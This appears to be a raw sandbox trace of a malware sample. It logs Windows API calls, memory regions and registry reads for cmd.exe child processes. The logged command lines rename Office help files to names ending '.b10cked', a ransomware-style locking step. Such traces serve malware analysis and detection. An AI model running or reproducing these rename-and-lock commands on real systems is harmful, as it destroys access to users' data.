[0201.824] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0201.824] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0201.824] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0201.824] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0201.825] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0201.825] _wcsicmp (_String1="MSMSPU~2.HXN", _String2=".") returned 63 [0201.825] _wcsicmp (_String1="MSMSPU~2.HXN", _String2="..") returned 63 [0201.825] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSPU~2.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msmspu~2.hxn")) returned 0x2022 [0201.825] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x241e50 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0201.825] SetErrorMode (uMode=0x0) returned 0x0 [0201.825] SetErrorMode (uMode=0x1) returned 0x0 [0201.825] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSPU~2.HXN", nBufferLength=0x104, lpBuffer=0x12ee5c, lpFilePart=0x12ee44 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSPU~2.HXN", lpFilePart=0x12ee44*="MSMSPU~2.HXN") returned 0x27 [0201.825] SetErrorMode (uMode=0x0) returned 0x1 [0201.825] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2012 [0201.825] _wcsicmp (_String1="MSMSPU~2.HXN", _String2=".") returned 63 [0201.825] _wcsicmp (_String1="MSMSPU~2.HXN", _String2="..") returned 63 [0201.826] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSPU~2.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msmspu~2.hxn")) returned 0x2022 [0201.826] SetErrorMode (uMode=0x0) returned 0x0 [0201.826] SetErrorMode (uMode=0x1) returned 0x0 [0201.826] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSPU~2.HXN", nBufferLength=0x104, lpBuffer=0x12f2d8, lpFilePart=0x12f070 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSPU~2.HXN", lpFilePart=0x12f070*="MSMSPU~2.HXN") returned 0x27 [0201.826] SetErrorMode (uMode=0x0) returned 0x1 [0201.826] SetErrorMode (uMode=0x0) returned 0x0 [0201.826] SetErrorMode (uMode=0x1) returned 0x0 [0201.826] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSPUB.DEV.14.1033.hxn.b10cked", nBufferLength=0x104, lpBuffer=0x12f4e0, lpFilePart=0x12f070 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSPUB.DEV.14.1033.hxn.b10cked", lpFilePart=0x12f070*="MS.MSPUB.DEV.14.1033.hxn.b10cked") returned 0x3b [0201.826] SetErrorMode (uMode=0x0) returned 0x1 [0201.826] SetLastError (dwErrCode=0x0) [0201.826] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSPUB.DEV.14.1033.hxn.b10cked" (normalized: "c:\\users\\alluse~1\\micros~2\\ms.mspub.dev.14.1033.hxn.b10cked")) returned 0xffffffff [0201.926] GetLastError () returned 0x2 [0201.926] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSPU~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x12e9ec, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12e9ec) returned 0x230e88 [0201.927] FindNextFileW (in: hFindFile=0x230e88, lpFindFileData=0x12e9ec | out: lpFindFileData=0x12e9ec) returned 0 [0201.927] FindClose (in: hFindFile=0x230e88 | out: hFindFile=0x230e88) returned 1 [0201.927] GetLastError () returned 0x12 [0201.927] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSPU~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x12e9ec, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12e9ec) returned 0x230e88 [0201.927] FindNextFileW (in: hFindFile=0x230e88, lpFindFileData=0x12e9ec | out: lpFindFileData=0x12e9ec) returned 0 [0201.927] FindClose (in: hFindFile=0x230e88 | out: hFindFile=0x230e88) returned 1 [0201.928] GetLastError () returned 0x12 [0201.928] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSPU~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x241bf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x241bf0) returned 0x230e88 [0201.928] FindNextFileW (in: hFindFile=0x230e88, lpFindFileData=0x241bf0 | out: lpFindFileData=0x241bf0) returned 0 [0201.928] FindClose (in: hFindFile=0x230e88 | out: hFindFile=0x230e88) returned 1 [0201.929] GetLastError () returned 0x12 [0201.929] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSPU~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x241bf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x241bf0) returned 0x230e88 [0201.929] FindNextFileW (in: hFindFile=0x230e88, lpFindFileData=0x241bf0 | out: lpFindFileData=0x241bf0) returned 0 [0201.929] FindClose (in: hFindFile=0x230e88 | out: hFindFile=0x230e88) returned 1 [0201.929] GetLastError () returned 0x12 [0201.929] _get_osfhandle (_FileHandle=2) returned 0xb [0201.929] GetFileType (hFile=0xb) returned 0x2 [0201.929] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0201.929] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12ebbc | out: lpMode=0x12ebbc) returned 1 [0201.929] _get_osfhandle (_FileHandle=2) returned 0xb [0201.929] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x12ebf0 | out: lpConsoleScreenBufferInfo=0x12ebf0) returned 1 [0201.929] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0201.931] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x12ec30 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0201.931] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x12ec14, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x12ec14*=0x2c) returned 1 [0201.931] longjmp () [0201.931] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.931] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0201.931] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.931] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0201.932] _get_osfhandle (_FileHandle=0) returned 0x3 [0201.932] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0201.932] SetConsoleInputExeNameW () returned 0x1 [0201.932] GetConsoleOutputCP () returned 0x1b5 [0201.932] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0201.932] SetThreadUILanguage (LangId=0x0) returned 0x409 [0201.932] exit (_Code=1) Process: id = "469" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16a80" os_pid = "0xd20" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSTO~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSTORE.14.1033.hxn.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29276 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 29277 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 29278 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 29279 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 29280 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 29281 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29282 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29283 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29284 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 29285 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 29710 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 29711 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 29712 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 29713 start_va = 0x3b0000 end_va = 0x4affff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 29714 start_va = 0x650000 end_va = 0x65ffff entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 29715 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 29716 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 29717 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 29718 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 29719 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 29720 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 29721 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 29722 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 29723 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 29724 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 29725 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 29726 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 29727 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 29728 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 29729 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 29730 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 29731 start_va = 0x4b0000 end_va = 0x5b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 29732 start_va = 0x660000 end_va = 0x125ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 29733 start_va = 0x1260000 end_va = 0x13c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001260000" filename = "" Region: id = 29976 start_va = 0x2d0000 end_va = 0x38ffff entry_point = 0x2d0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 665 os_tid = 0xd54 [0202.137] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cfc6c | out: lpSystemTimeAsFileTime=0x2cfc6c*(dwLowDateTime=0xad4a1880, dwHighDateTime=0x1d440a9)) [0202.137] GetCurrentProcessId () returned 0xd20 [0202.137] GetCurrentThreadId () returned 0xd54 [0202.137] GetTickCount () returned 0x390e9 [0202.137] QueryPerformanceCounter (in: lpPerformanceCount=0x2cfc64 | out: lpPerformanceCount=0x2cfc64*=25892641960) returned 1 [0202.138] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0202.138] __set_app_type (_Type=0x1) [0202.138] __p__fmode () returned 0x76b331f4 [0202.138] __p__commode () returned 0x76b331fc [0202.138] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0202.138] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0202.138] GetCurrentThreadId () returned 0xd54 [0202.138] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd54) returned 0x38 [0202.138] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0202.138] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0202.138] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.139] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0202.139] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cfbfc | out: phkResult=0x2cfbfc*=0x0) returned 0x2 [0202.139] VirtualQuery (in: lpAddress=0x2cfc33, lpBuffer=0x2cfbcc, dwLength=0x1c | out: lpBuffer=0x2cfbcc*(BaseAddress=0x2cf000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0202.139] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x2cfbcc, dwLength=0x1c | out: lpBuffer=0x2cfbcc*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0202.139] VirtualQuery (in: lpAddress=0x1d1000, lpBuffer=0x2cfbcc, dwLength=0x1c | out: lpBuffer=0x2cfbcc*(BaseAddress=0x1d1000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0202.139] VirtualQuery (in: lpAddress=0x1d3000, lpBuffer=0x2cfbcc, dwLength=0x1c | out: lpBuffer=0x2cfbcc*(BaseAddress=0x1d3000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0202.139] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x2cfbcc, dwLength=0x1c | out: lpBuffer=0x2cfbcc*(BaseAddress=0x2d0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xe0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0202.139] GetConsoleOutputCP () returned 0x1b5 [0202.139] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.139] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0202.139] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.139] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0202.139] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.139] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0202.139] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.139] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0202.140] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.140] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0202.140] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.140] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0202.140] GetEnvironmentStringsW () returned 0x3c0180* [0202.140] FreeEnvironmentStringsW (penv=0x3c0180) returned 1 [0202.140] GetEnvironmentStringsW () returned 0x3c0180* [0202.140] FreeEnvironmentStringsW (penv=0x3c0180) returned 1 [0202.140] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ceb6c | out: phkResult=0x2ceb6c*=0x40) returned 0x0 [0202.140] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ceb74, lpData=0x2ceb78, lpcbData=0x2ceb70*=0x1000 | out: lpType=0x2ceb74*=0x0, lpData=0x2ceb78*=0xa8, lpcbData=0x2ceb70*=0x1000) returned 0x2 [0202.140] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ceb74, lpData=0x2ceb78, lpcbData=0x2ceb70*=0x1000 | out: lpType=0x2ceb74*=0x4, lpData=0x2ceb78*=0x1, lpcbData=0x2ceb70*=0x4) returned 0x0 [0202.140] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ceb74, lpData=0x2ceb78, lpcbData=0x2ceb70*=0x1000 | out: lpType=0x2ceb74*=0x0, lpData=0x2ceb78*=0x1, lpcbData=0x2ceb70*=0x1000) returned 0x2 [0202.140] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ceb74, lpData=0x2ceb78, lpcbData=0x2ceb70*=0x1000 | out: lpType=0x2ceb74*=0x4, lpData=0x2ceb78*=0x0, lpcbData=0x2ceb70*=0x4) returned 0x0 [0202.140] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ceb74, lpData=0x2ceb78, lpcbData=0x2ceb70*=0x1000 | out: lpType=0x2ceb74*=0x4, lpData=0x2ceb78*=0x40, lpcbData=0x2ceb70*=0x4) returned 0x0 [0202.140] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ceb74, lpData=0x2ceb78, lpcbData=0x2ceb70*=0x1000 | out: lpType=0x2ceb74*=0x4, lpData=0x2ceb78*=0x40, lpcbData=0x2ceb70*=0x4) returned 0x0 [0202.141] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ceb74, lpData=0x2ceb78, lpcbData=0x2ceb70*=0x1000 | out: lpType=0x2ceb74*=0x0, lpData=0x2ceb78*=0x40, lpcbData=0x2ceb70*=0x1000) returned 0x2 [0202.141] RegCloseKey (hKey=0x40) returned 0x0 [0202.141] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ceb6c | out: phkResult=0x2ceb6c*=0x40) returned 0x0 [0202.141] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ceb74, lpData=0x2ceb78, lpcbData=0x2ceb70*=0x1000 | out: lpType=0x2ceb74*=0x0, lpData=0x2ceb78*=0x40, lpcbData=0x2ceb70*=0x1000) returned 0x2 [0202.141] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ceb74, lpData=0x2ceb78, lpcbData=0x2ceb70*=0x1000 | out: lpType=0x2ceb74*=0x4, lpData=0x2ceb78*=0x1, lpcbData=0x2ceb70*=0x4) returned 0x0 [0202.141] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ceb74, lpData=0x2ceb78, lpcbData=0x2ceb70*=0x1000 | out: lpType=0x2ceb74*=0x0, lpData=0x2ceb78*=0x1, lpcbData=0x2ceb70*=0x1000) returned 0x2 [0202.141] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ceb74, lpData=0x2ceb78, lpcbData=0x2ceb70*=0x1000 | out: lpType=0x2ceb74*=0x4, lpData=0x2ceb78*=0x0, lpcbData=0x2ceb70*=0x4) returned 0x0 [0202.141] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ceb74, lpData=0x2ceb78, lpcbData=0x2ceb70*=0x1000 | out: lpType=0x2ceb74*=0x4, lpData=0x2ceb78*=0x9, lpcbData=0x2ceb70*=0x4) returned 0x0 [0202.141] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ceb74, lpData=0x2ceb78, lpcbData=0x2ceb70*=0x1000 | out: lpType=0x2ceb74*=0x4, lpData=0x2ceb78*=0x9, lpcbData=0x2ceb70*=0x4) returned 0x0 [0202.141] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ceb74, lpData=0x2ceb78, lpcbData=0x2ceb70*=0x1000 | out: lpType=0x2ceb74*=0x0, lpData=0x2ceb78*=0x9, lpcbData=0x2ceb70*=0x1000) returned 0x2 [0202.141] RegCloseKey (hKey=0x40) returned 0x0 [0202.141] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a4 [0202.141] srand (_Seed=0x5b8863a4) [0202.141] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSTO~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSTORE.14.1033.hxn.b10cked\"" [0202.141] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSTO~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSTORE.14.1033.hxn.b10cked\"" [0202.141] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.141] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3c18e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0202.142] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0202.142] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0202.142] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0202.142] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0202.142] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0202.142] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0202.142] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0202.142] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0202.142] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0202.142] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0202.142] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0202.142] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0202.142] GetEnvironmentStringsW () returned 0x3c22d0* [0202.142] FreeEnvironmentStringsW (penv=0x3c22d0) returned 1 [0202.142] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.142] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0202.142] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0202.142] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0202.142] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0202.142] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0202.142] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0202.142] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0202.142] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0202.142] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0202.142] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2cf938 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.142] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2cf938, lpFilePart=0x2cf934 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2cf934*="Desktop") returned 0x18 [0202.142] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0202.143] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2cf6b4 | out: lpFindFileData=0x2cf6b4) returned 0x3c0010 [0202.143] FindClose (in: hFindFile=0x3c0010 | out: hFindFile=0x3c0010) 